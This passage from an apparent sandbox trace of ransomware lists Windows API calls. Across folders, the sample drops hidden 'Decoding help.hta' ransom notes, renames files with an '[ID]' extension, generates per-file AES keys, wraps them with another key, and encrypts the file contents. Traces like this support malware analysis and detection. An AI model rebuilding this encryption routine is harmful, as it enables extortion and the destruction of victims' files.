(lpString="Proof.msi") returned 9 [0057.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" [0057.493] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned 79 [0057.493] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpString2="Proof.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" [0057.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" [0057.493] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0057.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.494] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0057.494] CreateFileMappingA (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x87c [0057.494] CryptAcquireContextA (in: phProv=0x1e39fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1e39fcec*=0x3448830) returned 1 [0060.145] CryptGenKey (in: hProv=0x3448830, Algid=0x6610, dwFlags=0x1, phKey=0x1e39fce8 | out: phKey=0x1e39fce8*=0x5e2d70) returned 1 [0060.145] CryptExportKey (in: hKey=0x5e2d70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1e39fbe4, pdwDataLen=0x1e39fce4 | out: pbData=0x1e39fbe4*, pdwDataLen=0x1e39fce4*=0x2c) returned 1 [0060.145] MapViewOfFile (hFileMappingObject=0x87c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd8400) returned 0x8550000 [0063.112] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e39fbe4*, pdwDataLen=0x1e39fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1e39fbe4*, pdwDataLen=0x1e39fcf8*=0x100) returned 1 [0063.113] CryptEncrypt (hKey=0x5e2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8550000, pdwDataLen=0x1e39fce4*=0xd8400, dwBufLen=0xd8400) Thread: id = 459 os_tid = 0x714 [0045.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*", lpFindFileData=0x1e4dfd30 | out: lpFindFileData=0x1e4dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e31f0 [0045.526] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.526] FindNextFileW (in: hFindFile=0x5e31f0, lpFindFileData=0x1e4dfd30 | out: lpFindFileData=0x1e4dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.724] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.724] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.724] FindNextFileW (in: hFindFile=0x5e31f0, lpFindFileData=0x1e4dfd30 | out: lpFindFileData=0x1e4dfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0048.724] lstrcpyW (in: lpString1=0x5e88c10, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*" [0048.724] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*") returned 75 [0048.725] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\Decoding help.hta" [0048.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\decoding help.hta")) returned 0xffffffff [0048.725] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4 [0051.259] WriteFile (in: hFile=0x3c4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1e4dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1e4dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.013] CloseHandle (hObject=0x3c4) returned 1 [0055.313] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.146] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dwintl20.dll") returned -1 [0058.146] lstrlenW (lpString="dwintl20.dll") returned 12 [0058.146] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*" [0058.146] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*") returned 75 [0058.146] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", lpString2="dwintl20.dll" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" [0058.146] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" [0058.146] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.147] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688 [0058.147] CreateFileMappingA (hFile=0x688, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x550 [0058.148] CryptAcquireContextA (in: phProv=0x1e4dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1e4dfcec*=0x3448e08) returned 1 [0060.178] CryptGenKey (in: hProv=0x3448e08, Algid=0x6610, dwFlags=0x1, phKey=0x1e4dfce8 | out: phKey=0x1e4dfce8*=0x5e36b0) returned 1 [0060.178] CryptExportKey (in: hKey=0x5e36b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1e4dfbe4, pdwDataLen=0x1e4dfce4 | out: pbData=0x1e4dfbe4*, pdwDataLen=0x1e4dfce4*=0x2c) returned 1 [0060.178] MapViewOfFile (hFileMappingObject=0x550, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a580) returned 0x39d0000 [0061.939] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e4dfbe4*, pdwDataLen=0x1e4dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1e4dfbe4*, pdwDataLen=0x1e4dfcf8*=0x100) returned 1 [0061.941] CryptEncrypt (in: hKey=0x5e36b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39d0000, pdwDataLen=0x1e4dfce4*=0x1a580, dwBufLen=0x1a580 | out: pbData=0x39d0000*, pdwDataLen=0x1e4dfce4*=0x1a580) returned 1 [0064.939] UnmapViewOfFile (lpBaseAddress=0x39d0000) Thread: id = 460 os_tid = 0x688 [0045.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*", lpFindFileData=0x1e61fd30 | out: lpFindFileData=0x1e61fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e35b0 [0045.557] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.557] FindNextFileW (in: hFindFile=0x5e35b0, lpFindFileData=0x1e61fd30 | out: lpFindFileData=0x1e61fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.824] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.824] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.824] FindNextFileW (in: hFindFile=0x5e35b0, lpFindFileData=0x1e61fd30 | out: lpFindFileData=0x1e61fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0048.824] lstrcpyW (in: lpString1=0x10e1dc88, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*" [0048.824] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*") returned 83 [0048.824] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\Decoding help.hta" [0048.824] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\decoding help.hta")) returned 0xffffffff [0048.824] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0051.644] WriteFile (in: hFile=0x438, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1e61fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1e61fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.370] CloseHandle (hObject=0x438) returned 1 [0053.664] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.606] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AccessMUI.msi") returned 1 [0057.606] lstrlenW (lpString="AccessMUI.msi") returned 13 [0057.606] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*" [0057.606] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*") returned 83 [0057.606] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\", lpString2="AccessMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" [0057.606] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" [0057.606] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0057.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.596] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb84 [0061.596] CreateFileMappingA (hFile=0xb84, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb90 [0061.596] CryptAcquireContextA (phProv=0x1e61fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 461 os_tid = 0x7fc [0045.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*", lpFindFileData=0x1e75fd30 | out: lpFindFileData=0x1e75fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21c6910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c6910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3230 [0045.529] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.529] FindNextFileW (in: hFindFile=0x5e3230, lpFindFileData=0x1e75fd30 | out: lpFindFileData=0x1e75fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebb910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x21c6910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c6910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.729] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.729] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.729] FindNextFileW (in: hFindFile=0x5e3230, lpFindFileData=0x1e75fd30 | out: lpFindFileData=0x1e75fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x460d6f00, ftCreationTime.dwHighDateTime=0x1bdcbd5, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x460d6f00, ftLastWriteTime.dwHighDateTime=0x1bdcbd5, nFileSizeHigh=0x0, nFileSizeLow=0x176f, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENCY.GIF", cAlternateFileName="")) returned 1 [0048.729] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*" [0048.729] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*") returned 57 [0048.729] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\Decoding help.hta" [0048.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\decoding help.hta")) returned 0xffffffff [0048.729] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0051.415] WriteFile (in: hFile=0x2c4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1e75fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1e75fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.017] CloseHandle (hObject=0x2c4) returned 1 [0055.314] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.150] lstrcmpiW (lpString1="Decoding help.hta", lpString2="CURRENCY.GIF") returned 1 [0058.150] lstrlenW (lpString="CURRENCY.GIF") returned 12 [0058.150] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*" [0058.150] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*") returned 57 [0058.150] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\", lpString2="CURRENCY.GIF" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF" [0058.150] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF" [0058.150] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF.[ID]g9uZrLhJaygpwRm1[ID]" [0058.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.151] CreateFileW (lpFileName="\\\\?\\C:\\Program 